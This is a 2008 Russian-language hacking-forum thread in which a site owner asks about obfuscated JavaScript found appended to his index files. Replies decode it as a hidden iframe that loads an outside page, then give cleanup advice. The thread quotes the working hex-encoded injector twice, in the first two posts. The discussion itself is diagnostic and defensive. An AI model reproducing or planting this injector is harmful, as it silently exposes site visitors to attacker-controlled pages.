HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Болталка
Перезагрузить страницу Подскажите откуда....
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Подскажите откуда....
  #1  
Старый 08.08.2008, 11:26
brlamo
Banned
Регистрация: 15.05.2008
Сообщений: 40
С нами: 9468386

Репутация: 70
По умолчанию Подскажите откуда....
Вот сегодня на моем сайте появились жалобы на вирус... у меня стоит Касперский 7.0.1.325 с последним обновлением от 08.08.08 и его не видет. Зашел на фтп а там то что я и думал в конце индексных файлов вот такая беда:

PHP код:
<!-- o65 --><script language="JavaScript" type="text/javascript">var i,y,x="3c696672616d65207372633d22687474703a2f2f6e69636b646174696e672e636f6d2f636f756e7465722f696e6465782e70687022207374796c653d22646973706c61793a6e6f6e65223e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script><!-- c65 --> 
а можно узнать какие действия делает этот код. К сожалению я в этом ничего не понимаю

Да кстате... пароли я нигде не сохраняю на компьютере... та что получается хостер подвел?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 08.08.2008, 11:45
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
С нами: 11087066

Репутация: 561


По умолчанию
Цитата:
Сообщение от brlamo  
Вот сегодня на моем сайте появились жалобы на вирус... у меня стоит Касперский 7.0.1.325 с последним обновлением от 08.08.08 и его не видет. Зашел на фтп а там то что я и думал в конце индексных файлов вот такая беда:

PHP код:
<!-- o65 --><script language="JavaScript" type="text/javascript">var i,y,x="3c696672616d65207372633d22687474703a2f2f6e69636b646174696e672e636f6d2f636f756e7465722f696e6465782e70687022207374796c653d22646973706c61793a6e6f6e65223e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script><!-- c65 --> 
а можно узнать какие действия делает этот код. К сожалению я в этом ничего не понимаю

Да кстате... пароли я нигде не сохраняю на компьютере... та что получается хостер подвел?
Вот что он делает:
Код HTML:
<iframe src="http://nickdating.com/counter/index.php" style="display:none">
А откуда - либо сайт у тебя дырявый, либо хостера похекали.
__________________
Full DNS report
 
Ответить с цитированием

  #3  
Старый 08.08.2008, 11:51
brlamo
Banned
Регистрация: 15.05.2008
Сообщений: 40
С нами: 9468386

Репутация: 70
По умолчанию
Спасибо за объяснение!
Кстате рекомендуют сразу чистить этот мусор и менять пароли на фтп и в cpanel.... может что еще надо бы сделать? или наоборот ничего не надо?
 
Ответить с цитированием

  #4  
Старый 08.08.2008, 12:03
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
С нами: 9443906

Репутация: 3313


По умолчанию
Перезалить прошлый бэкап
 
Ответить с цитированием

  #5  
Старый 08.08.2008, 12:04
ProTeuS
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,367
С нами: 11291486

Репутация: 2175


По умолчанию
4истить страницу, менять пасы, пат4ить софт
 
Ответить с цитированием

  #6  
Старый 08.08.2008, 12:06
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
С нами: 11087066

Репутация: 561


По умолчанию
Почисти, поменяй, посмотри права файлов, которые редактировались, поставь 744 или rwxr--r--.
__________________
Full DNS report
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
подскажите stalles Болталка 11 08.09.2005 13:24



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.